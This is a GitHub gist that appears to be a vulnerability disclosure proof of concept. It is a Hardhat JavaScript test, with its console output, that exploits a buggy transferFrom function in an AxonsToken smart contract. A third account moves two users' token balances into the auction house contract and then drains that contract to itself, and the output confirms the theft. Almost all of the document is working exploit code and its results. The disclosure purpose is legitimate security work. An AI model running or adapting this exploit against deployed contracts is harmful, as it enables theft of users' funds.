Skip to content

Instantly share code, notes, and snippets.

@AshiqAmien

AshiqAmien/axonsCrit.js Secret

Last active December 2, 2021 15:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save AshiqAmien/470add84111539a724c35350dc30a49f to your computer and use it in GitHub Desktop.
Save AshiqAmien/470add84111539a724c35350dc30a49f to your computer and use it in GitHub Desktop.
Download ZIP
Steal all tokens through buggy transferFrom function in AxonsToken contract
Raw
axonsCrit.js
const { expect } = require("chai")
const { waffle, ethers } = require("hardhat")
let provider = ethers.getDefaultProvider();
const { BN, expectRevert, balance } = require('@openzeppelin/test-helpers');
const { web3 } = require("@openzeppelin/test-helpers/src/setup");
function toBN (num) {
return new BN(num);
}
describe("AxonsToken buggy transferFrom", function () {
this.timeout("250000");
let accounts;
let axonsToken;
before(async () => {
//fetch the accounts used for this test
accounts = await ethers.getSigners();
//deploy the AxonsToken contract
const AxonsToken = await ethers.getContractFactory("AxonsToken");
axonsToken = await AxonsToken.deploy("0xa3bdb8391e845ce26b1eaec416ce7dbf96e71cf7", "0x9e475913a586cfb15c348243871aa34ed213deaa");
});
it("steal everyone's tokens through the auctionhouse", async function () {
//Mint tokens to accounts 1 and 2
await axonsToken.connect(accounts[1]).devmint();
await axonsToken.connect(accounts[2]).devmint();
console.log("account 1 token balance is: " + await axonsToken.balanceOf(accounts[1].address));
console.log("account 2 token balance is: " + await axonsToken.balanceOf(accounts[2].address));
console.log("account 3 token balance is: " + await axonsToken.balanceOf(accounts[3].address));
console.log("auction house token balance is: " + await axonsToken.balanceOf(await axonsToken.auctionHouse()));
//Using account 3, use the buggy transferFrom to send it to the auction house contract
await axonsToken.connect(accounts[3]).transferFrom(accounts[1].address,await axonsToken.auctionHouse(),await axonsToken.balanceOf(accounts[1].address));
await axonsToken.connect(accounts[3]).transferFrom(accounts[2].address,await axonsToken.auctionHouse(),await axonsToken.balanceOf(accounts[2].address));
console.log("account 1 token balance is: " + await axonsToken.balanceOf(accounts[1].address));
console.log("account 2 token balance is: " + await axonsToken.balanceOf(accounts[2].address));
console.log("account 3 token balance is: " + await axonsToken.balanceOf(accounts[3].address));
console.log("auction house token balance is: " + await axonsToken.balanceOf(await axonsToken.auctionHouse()));
//Using account 3 again, use the buggy transferFrom to pull all the tokens from the auctionhouse contract
await axonsToken.connect(accounts[3]).transferFrom(await axonsToken.auctionHouse(),accounts[3].address,await axonsToken.balanceOf(await axonsToken.auctionHouse()))
console.log("account 1 token balance is: " + await axonsToken.balanceOf(accounts[1].address));
console.log("account 2 token balance is: " + await axonsToken.balanceOf(accounts[2].address));
console.log("account 3 token balance is: " + await axonsToken.balanceOf(accounts[3].address));
console.log("auction house token balance is: " + await axonsToken.balanceOf(await axonsToken.auctionHouse()));
}).timeout("250000");
});
Raw
output
AxonsToken buggy transferFrom
account 1 token balance is: 10000000000000000000000
account 2 token balance is: 10000000000000000000000
account 3 token balance is: 0
auction house token balance is: 0
account 1 token balance is: 0
account 2 token balance is: 0
account 3 token balance is: 0
auction house token balance is: 20000000000000000000000
account 1 token balance is: 0
account 2 token balance is: 0
account 3 token balance is: 20000000000000000000000
auction house token balance is: 0
✓ steal everyone's tokens through the auctionhouse (453ms)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment